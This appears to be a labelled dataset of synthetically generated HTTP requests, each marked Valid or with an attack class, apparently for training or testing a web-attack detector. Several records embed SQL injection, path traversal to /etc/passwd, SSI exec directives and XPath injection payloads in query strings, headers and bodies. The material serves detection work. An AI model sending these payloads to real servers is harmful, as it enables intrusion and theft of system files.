Expect: 100-continue
From: ueaw@nsel.fr
If-Modified-Since: Mon, 08 Oct 07 21:53:12 GMT
If-Unmodified-Since: Fri, 23 Oct 09 17:22:19 UTC
If-Match: "R3BAtLctNgxyerZtI"
If-None-Match: "Kfgf0N_mMjZFu9Os"
If-Range: *
Max-Forwards: 54
MIME-Version: 0.0
Pragma: ic='q'
Proxy-Authorization: NTLM Y3hkaG1lRXNpYnllbnQ1anRubEc2b29hdGxwbGhpYWVudGU3blQxdGVlc3RhdHI=
Authorization: Digest cnonce="idnIcjtd"
Range: -9710,4363-45984
Referer: /tsiee/rTenott/a5i3/refatt3g/h1E1Gqe.msf
TE: trailers,deflate
Trailer: From
User-Agent: Mozilla/7.8 (X11; U; Open BSD i586 0.7; ei-rt; rv:6.7.5) Gecko/65694462
UA-CPU: Sparc
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: 4.8 18.115.16.45, 8.6 www.eol7.jpg
Transfer-Encoding: 1cet; lemn=xvyie
Upgrade: si8aut/4.9, hxi/6.6
Warning: 699 www.hianxs.tiff "sqvuine" "Mon, 25 Feb 08 14:59:17 CET"
X-Forwarded-For: 126.30.228.195
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20374
Start - Id: 41699
class: SqlInjection
GET /rd4/n5W@KHv./HPeetasekeed5cae/BW_delete.mspx?eInodia=sCwADZ_&ua0rhvssdrera=%27+++OR+%27rf3seee%27++%3D++N%27++&mnC1d=M7%3A+processing-instructiontabpls%25u8&neTeuiO=eedb4krdiidet3o&sg=toi4tm%5Dne&oehttuh2=qeperlpo&idnoeSA=rp8ui&ts5=ctd HTTP/1.0
Host: 92.177.20.20:34158
Connection: Rcr8ewYa
Accept: image/jpeg;q=0.5, image/png;q=0.2, text/html
Accept-Charset: *
Accept-Encoding: gzip;q=0.5
Accept-Language: gthenO-tn6;q=0.7, orrsssy-pmbp, xeOpdtw-nAili3;q=0.5, Ticixeh-cmroadk
Cache-Control: max-age=3
Client-ip: 51.187.24.113
Cookie: aihe3rreOeieT=088240
Cookie2: $Version="017"
Date: Sat, 21 Jul 07 13:18:38 GMT
ETag: "ms1MadMBVHvYr8Op"
Expect: nllry
From: ube8gesO@rdptemmi.st
If-Modified-Since: Wed, 08 Dec 04 11:10:56 GMT
If-Unmodified-Since: Thu, 25 Sep 08 01:17:27 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Jun 05 13:30:32 CET
Max-Forwards: 311
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic QXNlbzBuNVM6ZWVyZWJrdHk=
Range: 271923-
Referer: /gnesHA/y4dol.cfm
TE: gzip;q=0.6,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.9 (Windows; U; Win98 8.4; li-ca; rv:3.1.1) Gecko/87166208
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
Via: tce/7.4 170.99.27.27, 7.3 www.eOIioun.png, fnleea/4.2 www.paesu.html
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 137 173.7.112.18 "mIt3it3cidet" "Sun, 16 Sep 07 01:52:40 GMT"
X-Forwarded-For: 200.2.71.249
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41699
Start - Id: 46409
class: PathTransversal
GET /uBnc1l/sKNBPTJluOza2/oqra7rwkoabEinlm64si/efRedi/zKUEni/8tuscri2ea8js.jsp?tqde3tn=Kn8runirr&ah1a=uzgdh-&2ess=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&dxntieh=nTwcDt1MPZn HTTP/1.0
Host: 36.77.155.81
Connection: daedvy
Accept: image/png, audio/*;q=0.3, image/gif
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=65
Client-ip: 43.17.188.82
Cookie: 3ftpBcdC=zNAb1O@mF1L;aalOd=dsxn48neaneetNGhs1;sde4laohtmgi8DH=h;tgunihhd=RNtfIEniir7eo0abc;niBt=mtIe
Cookie2: $Version="2"
Date: Thu, 22 Dec 05 09:31:17 UTC
ETag: "nzNGDS.22k6TV@-"
Expect: 100-continue
From: wegeqhea@e2xmcrate.uk
If-Modified-Since: Tue, 13 Sep 05 18:01:09 UTC
If-Unmodified-Since: Thu, 08 Apr 04 06:11:31 GMT
If-Match: "eEkAGWc@H9GgtREHtdi"
If-None-Match: "5tg97sA3L82reKTqWR7L"
If-Range: *
Max-Forwards: 5587
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=91bcfFB4
Range: 8-5,865609-
Referer: http://www.Ciaria.com/gtu7lt/kte8/lrb64l/ammtP/OoOh.dll
TE: deflate,trailers
Trailer: TE
User-Agent: Mozilla/2.5 (X11; U; SunOS sun4u 2.9; oH-un; rv:3.7.7) Gecko/07553555
UA-CPU: x86
UA-Disp: 459,725,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 525x634
Via: FTP/4.4 www.pddl4t8.htm, 2.9 www.gtnata.shtml:68, FTP/4.7 184.175.141.134
Transfer-Encoding: compress
Upgrade: 1qohtl/5.6, dsgali/4.9
Warning: 321 www.qhjnlsh.gif "tzcnI8rhloto3rnecm" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46409
Start - Id: 8852
class: Valid
GET /or8ag/tWnm.0oprvTX/bGJ02P/yTVU1OM7Lai6A5.html? HTTP/1.1
Host: www.4ceikR.net
Connection: 1ixRiJe
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.3, deflate;q=0.0, deflate, compress
Accept-Language: jh-tgisy8m
Cache-Control: no-transform
Client-ip: 252.175.148.100
Cookie: lirleyya1a=jntsb;rsna=xEt nae[T nwqa;KvncC-qs=839849;mo8ynte=yUnsohRnitieaeewo;yrS8nu7968z=asimseraRzpliaw3e;dn0dssxvh6=c;tmpt-
Cookie2: $Version="67"
Date: Thu, 23 Sep 04 12:06:33 CET
ETag: W/"iQi3m4c9Ivfsr9BCO."
Expect: 100-continue
From: nnsIg@cmoeufg.uk
If-Modified-Since: Fri, 29 May 09 10:12:55 UTC
If-Unmodified-Since: Sat, 13 Sep 08 16:50:53 GMT
If-Match: *
If-None-Match: "eDvAM4LsFqLZqvGleZac"
If-Range: "yrh.4q0812bsXRB"
Max-Forwards: 575
MIME-Version: 1.5
Pragma: uot0l=jprx
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest cnonce="fhsros9"
Range: 7-
Referer: http://www.sqiihy.de/d3ecu/yTrlihni/pirrc/enj2eb/ccglnnnt.mspx
TE: gzip;q=0.1
Trailer: Max-Forwards
User-Agent: Mozilla/4.8 (compatible; Konqueror/4.4; SunOS sun4u; ceenteona)
UA-CPU: StrongARM
UA-Disp: 909,1237,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 186x0429
Via: FTP/5.9 22.185.17.144, HTTP/3.8 34.96.149.14
Transfer-Encoding: deflate
Upgrade: it9o/7.8, e4esfs/7.3, Csos/8.4
Warning: 091 www.bqal5R.jpg "tAj9t" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8852
Start - Id: 19085
class: Valid
GET /wwSLfQaghl_./yNqQ8@dB/pLrrnha3elb/0v/e6i4o/ai2tsn85ambmib.swf?hh8Xiasae=anvJ&raei=im+ir4%3Aee&EehS=6nOeirde%5Da9tWi&kth9hbthdoHaa=oshntsdmrreree&neHeqra0yDnlf=tv%3AilErr%24vbscriptusrsnvbscripta+3e&bidpiafshmv=651072141&rpahacioen=M1d&QEyh5iw=a8ErnLZ-8RPc&usagnGubc=6909&irallrn=fr9neeEg0ri&Cne=10763&BYuXUl3xYhttpsn=t HTTP/1.0
Host: 133.205.60.11
Connection: efsafe
Accept: */*;q=0.9
Accept-Charset: us-ascii
Accept-Encoding: deflate, deflate;q=0.9, compress
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 222.183.198.147
Cookie: form6mR=4062;ecja6d4ol=0
Cookie2: $Version="843"
Date: Thu, 25 Mar 10 22:04:52 CET
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: r1Defz
From: nun9o@s8ehqoner.cz
If-Modified-Since: Tue, 16 Jun 09 14:39:26 GMT
If-Unmodified-Since: Wed, 12 Jan 05 01:54:20 GMT
If-Match: "6oL5TR6NgVL8IywW6Kw"
If-None-Match: *
If-Range: *
Max-Forwards: 089
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM NHBwdDFldGVlaXQxbm1nb3J0SXRobnlubnRyczV0ckFobmhlYQ==
Authorization: NTLM MW5pN29yY2lUZXByZWVlY292b2ZhanJlcmV0NWNlYWV2ZQ==
Range: 2-4,83-,-0
Referer: /ttflm.cgi
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/8.2 (Windows; U; Win98 3.0; sd-As; rv:0.3.9) Gecko/43923111
UA-CPU: x86
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x039
Via: HTTP/1.9 www.hpaNuub.gif, 2.1 102.122.7.12, n3edzr/2.4 88.74.187.240
Transfer-Encoding: gzip
Upgrade: mTec5/5.9, iRo/8.2, 5e5e/7.4
Warning: 769 www.ynfoTewU.png "tyneuSih9ho" 
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19085
Start - Id: 6455
class: Valid
POST /it1r9moee/ssmt4nqrgkOuOrr3s8ge/tJ9Lfy.nxV/r5.mPOt5PFxj2O/taiatX/r9olscIHuartufws/8aRjO8/_PuMlshf.pl? HTTP/1.0
Content-Length: 255
Content-Language: oCn
Content-Encoding: deflate
Content-Location: /wphchega/leiape/98sgh/esAlUn.exe
Content-MD5: ZWV0dGVkZWhnRGljbWVhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Dec 04 07:03:38 UTC
Last-Modified: Sun, 08 May 05 13:38:11 GMT
Host: www.zfdi.gov:6
Connection: 9t6e0i
Accept: image/gif
Accept-Charset: iso-8859-2, iso-8859-7;q=0.5, euc-cn;q=0.6, x-mac-icelandic;q=0.6, big5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 174.238.79.189
Cookie: lphn1Bv05onicdb=e;scneo4nhepTg7f=0hsdrotwrtrtfaeroe;C9C@6Is9IM=983;heds10qat=ity5;M6=5
Cookie2: $Version="601"
Date: Thu, 02 Dec 04 15:30:00 GMT
ETag: "kPFsYvPUuAuZ9Q93z.uJ"
Expect: 100-continue
From: aVFabc@O7fpolootx.be
If-Modified-Since: Fri, 09 Dec 05 13:34:15 GMT
If-Unmodified-Since: Wed, 31 May 06 08:36:58 GMT
If-Match: "a2aoYvy8V2xqP1LcKcI"
If-None-Match: "2AuK3_ArIb4Jrvc0."
If-Range: "qhK5Y-L26SP@FsYjU"
Max-Forwards: 7
MIME-Version: 3.4
Pragma: u9tajlm='c7rnbm'
Proxy-Authorization: Basic bmxpZW1lZTpFeWFhYQ==
Authorization: Basic b3BveWd0OmhFY1pvb2g=
Range: 35260-775435,47-,92-626366
Referer: /nlic/anbyec/e6oYpiu.css
TE: gzip
Trailer: From
User-Agent: betaoiswr/1.7
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8174x6805
Via: snsrse/1.2 237.186.210.218, 7.3 www.ihbidp2b.jpeg
Transfer-Encoding: compress
Upgrade: e0o/2.6, hfi/6.9, wued/6.3
Warning: 447 37.2.170.213 "8reqteinidDfS9tu7r6" "Mon, 13 Mar 06 18:40:21 UTC"
X-Forwarded-For: 218.75.218.198
X-Serial-Number: 003791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

alt0=l7o9g&NnqnO2e=wic at&nn0ytiIeSyha8ia=ees Ym4r5r&P@bC.RFechildIeu=496&doShuaoeeaor=9xp_ew&fmtmsotnfc=rf&ine=aie7&Vemochanqr-njU=eKaj_XdJx5&qvo@ifrom=2&hsSRZevalal=or&qrseaw7rta=idZ6-M&FbMmXvMWadropKexec=cechoeunodet3e2-eiOo&ziknaegtomasni=]T2uhsfzsr

End - Id: 6455
Start - Id: 13132
class: Valid
GET /meh6SiwcitI/uVs/moecicoHXpp/SuK@.png?lb7ataRnl=sbr&swo=group+byyah+iortdforml&dp82tbmomuLWidi=uruea&ov4otoefweoasot=HeimE&mFMI=6705609198&idhdooayi7th=8937&a9usmxInfpmes=he3hrye9iexs&kenept=%3Bunlcsaqn%29%7Ctallcincludea%29Uu&el1po4w=20&S66xzLold=ayTW5&ORrvdihrf0r=22470&ihiwEanrigqz=jTyi&mamhHLqe=847522 HTTP/1.0
Host: www.leuebbio.st
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew;q=0.0, x-mac-japanese;q=0.9, utf-8, cp-950;q=0.8, x-mac-greek;q=0.4
Accept-Encoding: 
Accept-Language: i2-6end;q=0.7, 6ui-GmhdwsQj, l2c-xetm;q=0.0, utpq-comfss;q=0.8, yeec-aTcr;q=0.2
Cache-Control: no-cache
Client-ip: 50.191.195.2
Cookie: tuyDYUhcO1N=8324;eonencteie=nehey0oehirrn
Cookie2: $Version="578"
Date: Sun, 04 Feb 07 17:39:27 UTC
ETag: "EZnUQu-V3qHKvOtWYS"
Expect: 100-continue
From: rBs84eg@im6v.st
If-Modified-Since: Mon, 02 Aug 04 16:17:55 GMT
If-Unmodified-Since: Fri, 06 Jul 07 14:01:18 GMT
If-Match: "KH-4_Ys6CVB@JndIhG"
If-None-Match: "ZV6Im912Bdmm9CcdazWa"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: Digest opaque="Nytiidev"
Range: -6626
Referer: http://eifa.net/teee/Hthp/0y90ar/taHucn.wav
TE: trailers,deflate,deflate
Trailer: Warning
User-Agent: eoholletadirod
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9714x547
Via: HTTP/3.6 83.100.196.193:2, 7.9 www.xiwts.tiff, HTTP/9.1 www.9rTdsscb.js
Transfer-Encoding: deflate
Upgrade: ieri/8.8, fihXea/0.2, pcuC/3.5
Warning: 988 www.pasceto.js "hpmirfwelzcei" 
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 6109336510742510
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13132
Start - Id: 41800
class: SqlInjection
GET /anunm/rqitaeflnetSHYo/pV/eMWO_ireplace-bXs/rnaeepi/33gvaHbqR.qmcUiQxv/aaesc/s@/ADfWHkz4.png?ratretl=and+0%3C%3E%28select+count%28*%29++++from+++++hcr+where+eotwld%3C%3E%29&ie=ollanehH&tu=bboot.iniiNert%27js%3Asb HTTP/1.1
Host: 131.189.170.13:80
Connection: TIi1
Accept: application/postscript;q=0.5
Accept-Charset: x-mac-greek;q=0.9, cp-936;q=0.3, iso-8859-1;q=0.5, iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=10
Client-ip: 218.44.126.244
Cookie: svaNelkeht=er;nltchk5wrlhh=h;iusb6=ehcidOtn oqs;hi=0;Z8cuw.ercpdocumenthavingEF=9psgOeskns;rxtei=hUp.nJ2-Be
Cookie2: $Version="874"
Date: Tue, 31 Oct 06 20:06:57 UTC
ETag: W/"u-p0upc_i-I_o6YnCF5"
Expect: ytnux=thiRx
From: ame9p@neehptrbo.fr
If-Modified-Since: Sat, 01 Sep 07 10:06:13 CET
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: "77e92Z0oWxPyN5gW"
If-Range: *
Max-Forwards: 9815
MIME-Version: 8.5
Pragma: tmge=bSuNI
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: osyatE g2aorS=yuuca
Range: 82059-
Referer: /rSvhol.jpeg
TE: gzip,trailers,deflate;q=0.4
Trailer: Max-Forwards
User-Agent: otlnntoIrn/2.7.9.6.9
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1113x6739
Via: HTTP/3.3 www.ewtr.tiff, 3.4 177.220.63.188
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 864 www.eeeoa.css "hlrre9anouesreagre4w" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 12063263563674128535
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41800
Start - Id: 24047
class: Valid
GET /@ZVJa/89M_Bnlr/SuLtu/adytj/inopenL6KeTZpu/ox.ykB3gmE86yqnCRnX/_hr6access_logm/nuEV8aYSpHZEN.jsp? HTTP/1.0
Host: www.3ii09pfs.be
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: aa=oh
Client-ip: 214.13.211.193
Cookie: -np%upasswdSUWoA8bin=idnpss;tae=54958
Cookie2: $Version="261"
Date: Wed, 23 Mar 05 02:34:08 GMT
ETag: "k5I2Oz1HtSkVPYxvG-5T"
Expect: era0lhbh
From: ategn@e61x0hpQf.ch
If-Modified-Since: Sun, 30 Mar 08 22:31:10 CET
If-Unmodified-Since: Wed, 26 Apr 06 21:07:47 UTC
If-Match: "_fW7-7zbQtGcdpfCeGB"
If-None-Match: *
If-Range: Wed, 15 Oct 08 20:52:47 GMT
Max-Forwards: 9762
MIME-Version: 6.0
Pragma: o=ee
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: lnooe 7tatmoTa=ubrUp
Range: 1465-8653,387-,609806-355362
Referer: http://www.Et2ul3e.ch/vj0bneHw/einq.tiff
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/7.1 (X11; U; SunOS sun4u 3.1; im-wm; rv:1.1.5) Gecko/10985803
UA-CPU: x86
UA-Disp: 2666,719,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 314x0873
Via: 7.7 154.82.139.132
Transfer-Encoding: compress
Upgrade: cUYte/7.0, Lbem/8.5, drnfie/8.0, np54/2.3, taoeT/3.0
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 240.187.200.43
X-Serial-Number: 81619019081
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24047
Start - Id: 45187
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.1
Host: 148.111.207.179
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: 6tsa-tnlnr, l4toxwh-tp, ac-atTnHeus;q=0.0
Cache-Control: no-transform
Client-ip: 29.232.237.153
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Thu, 26 Nov 09 05:01:42 GMT
ETag: W/"Om2MM2xg9YxaUgf@.A"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Wed, 27 Jun 07 03:07:21 UTC
If-Unmodified-Since: Wed, 19 Oct 05 22:53:29 UTC
If-Match: "xgznTSO9INjdkIy1E"
If-None-Match: *
If-Range: Fri, 16 Jul 04 05:10:34 UTC
Max-Forwards: 8730
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: Digest algorithm=MD5
Range: -8661
Referer: http://krB2eeao.org/eo2afH.pl
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/5.1 (X11; U; SunOS sun4u 7.9; ns-ik; rv:5.7.9) Gecko/21669021
UA-CPU: StrongARM
UA-Disp: 370,8487,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: HTTP/9.8 186.248.208.45, FTP/8.2 www.ulleefa.html, 7.0 168.238.64.146:97
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45187
Start - Id: 4732
class: Valid
POST /n8ehrsred/mprbemms1easW/swFiolVfQI.KG4D/8Xg7Xl.imrXanc/1Zi6O9yUZnT0/1pQpC@/e6qujMx5SbRq@1-gw/IDtroif/ngjO-Cqb/e@bgLUlc/d.oNZSeuqy3Xe-A8.php4? HTTP/1.1
Content-Length: 226
Content-Language: i3
Content-Encoding: compress
Content-Location: http://lhhSeo.fr/shztrpl/sPYShdt/rcmaae/anrSna7.asmx
Content-MD5: cjRzZWhvM3R0ZXR2c3VzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Sep 04 08:33:57 GMT
Last-Modified: Sat, 19 May 07 05:00:53 GMT
Host: www.ogsmdvdm.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 61.169.94.245
Cookie: e4catEperlL=3772124946;in7ot=asaie lv'cee;lhTtyt1e=q38MFknE;c3efrejibss=ao5e4obwgethttapeh
Cookie2: $Version="2"
Date: Sun, 22 Aug 04 16:18:56 GMT
ETag: "OTgook5dwEyJEDOEqp"
Expect: 100-continue
From: oeiar@ohs7.com
If-Modified-Since: Sat, 10 Apr 10 18:00:16 GMT
If-Unmodified-Since: Sun, 19 Jun 05 05:27:21 GMT
If-Match: *
If-None-Match: *
If-Range: "7lmGT7JcH.Q3v4YeEq"
Max-Forwards: 101
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM NmdycnBldm9hb3Z6Yml1bU00aWxjZWRzcmFyZGVlbGVFZXJ0YUN0Y2NlUXNu
Authorization: Digest nc=09D20E91
Range: -31108
Referer: http://iem9ahei.ch/anlhcj/TeTi/disa.sh
TE: gzip
Trailer: Transfer-Encoding
User-Agent: pAIote/0.8
UA-CPU: MIPS
UA-Disp: 564,453,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4366x138
Via: 7.2 252.129.31.139
Transfer-Encoding: deflate
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 956 24.210.177.89 "qt9hoeeRnsan5aor" "Sat, 30 Sep 06 12:08:47 GMT"
X-Forwarded-For: 121.38.195.75
X-Serial-Number: 64993875
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

k3en=epEEt3E&oh=qkP0s&Xfcagginleiy=73&ts6poI0=ejO&ttmdamisslft=nbtvix9M&iuecgaaipasotd=057&2rie9eNttR=i@&wer3f=fwo38?&sstouointnsietE=eEKff&Lnph-476=i_CHaTLlh&uue4lOji=eByw&e3ljNsgsdRefee=|5s&enlewwoulyots=epH@SR7WcauA

End - Id: 4732
Start - Id: 39314
class: SSI
GET /essornejemtc00ag/sVLuSoivI/rXwgPRrOShi2oA/Caetseldies6ouoaeom6/dZCF9WHGNrcuAy8uZHD5/rsoa5HWi/idr.bin?8othnvxnbNfmTn=netoA&soEvhiiet5aeeiq=Jbodyflike%7C%28n-aTfwaSnph-&oqiceyc3tudux=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&56e=v0%40zJNj&qsbcog=21k1Q&hnf4resHytlthw=e2t&eoinm4s8oeefnor=1417084&ST8poZeIj=0589 HTTP/1.1
Host: 139.192.215.56
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 192.88.225.132
Cookie: Obp=c
Cookie2: $Version="6"
Date: Thu, 29 Nov 07 02:17:41 CET
ETag: "1pA1U.J7IAhA3yekD"
Expect: niMp
From: dZei@fOseTvsS7.biz
If-Modified-Since: Fri, 24 Jun 05 18:18:24 GMT
If-Unmodified-Since: Sun, 30 Apr 06 20:10:28 CET
If-Match: *
If-None-Match: "ZVQuLT6wD8sftiDTCJ45"
If-Range: Fri, 15 Feb 08 18:17:11 GMT
Max-Forwards: 0576
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: NTLM ZnRtZG9hdG9uaWVtaWdIMTd1b2VubjA1YmN4cDV0RGVlYXBuMm90QWVNeWQxZ2Fl
Range: 326-,2201-0740,2-99478
Referer: /btaI/15tpsok/sist/intj.jpg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: klsiEsto (yDzScf5R.; nBpRyjqef3; tQ@nUWSe4f; poIuEO; h-SajZ4Yz)
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: gzip
Upgrade: bFbb/5.5
Warning: 070 170.64.102.87 "denlnse4nrsv" "Tue, 19 Aug 08 18:04:18 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39314
Start - Id: 48611
class: XPathInjection
PUT /nfnod/eE5BX/lS/9zT4LN9UOCUUW.QUy7/niohoh1fOjquaal/eoJGFuPkM3kKfBOAQR/oOZXHjlB/tulmrkdwRUso.msf? HTTP/1.0
Content-Length: 359
Content-Language: e,r9o
Content-Encoding: identity
Content-Location: http://zmnoaa.org/usmiot/s7ne.cfm
Content-MD5: b2VwOWxPcGN0eXVhdGxzNg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jun 08 18:20:09 UTC
Last-Modified: Sun, 06 Apr 08 09:36:20 UTC
Host: www.aiu1v.be:6
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 135.188.231.70
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Mon, 13 Jul 09 09:56:24 CET
ETag: "pJxJ92AJ3eoiDG3vZ9"
Expect: 100-continue
From: oetv@ciasa9meg.net
If-Modified-Since: Tue, 25 Nov 08 10:20:34 CET
If-Unmodified-Since: Wed, 05 Jan 05 10:37:36 CET
If-Match: "TJbu0XyWf_7r3P9"
If-None-Match: "51DffmBOSGObR2BmGo."
If-Range: *
Max-Forwards: 674
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Digest algorithm=hSolhe8f
Range: 3-574
Referer: /ose4alrp/teqd/raciee/rosa/liah.asp
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: ivNrr (3e-69XG; s5tiV-w7P)
UA-CPU: Sparc
UA-Disp: 7774,1775,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 474x394
Via: fssdh/6.8 www.jmeetos.gif, y4STrI/4.2 26.62.232.149
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: ---------------------
~~~~~: ~~~~~~~~~~

nzez=e&labcaeei24iv=9&lddo=3KRDF&jn0oJ5=bboeoHhitsdnior&ot5f=hy&r4e=wherexi\f8lhloried&aneaO2eoitz=0&ijuriMatoelees=82598 or    1<  nmze/c/ea/child::text()[position()=92]     or   4511='] | /* | /foo[bar='&b0e=ie9)gnYeo&olzgoneeyoh=|&sU4seo=ento+&7wE.8@B3q=795&dnrypSorRo=281336&tiiHi=362613&33ielzcbp=ct7

End - Id: 48611
Start - Id: 39132
class: SSI
GET /8H5hh3w2ap/ee8tssnlito4iogtehk/8Alhi/AQ.html?tn1Tnt=r3W-_ern&aluhqQxehnax=5StcF_jxNi&tme1iiSht=t36t9 HTTP/1.1
Host: 235.21.80.238:348
Connection: keep-alive
Accept: image/png, application/zip, image/*
Accept-Charset: *
Accept-Encoding: <!-- #exec   cgi="/cgi-bin/script?rdbev"   -->
Accept-Language: lRm-tyw, hGpat-ihd, g8-y;q=0.5
Cache-Control: no-transform
Client-ip: 185.64.68.127
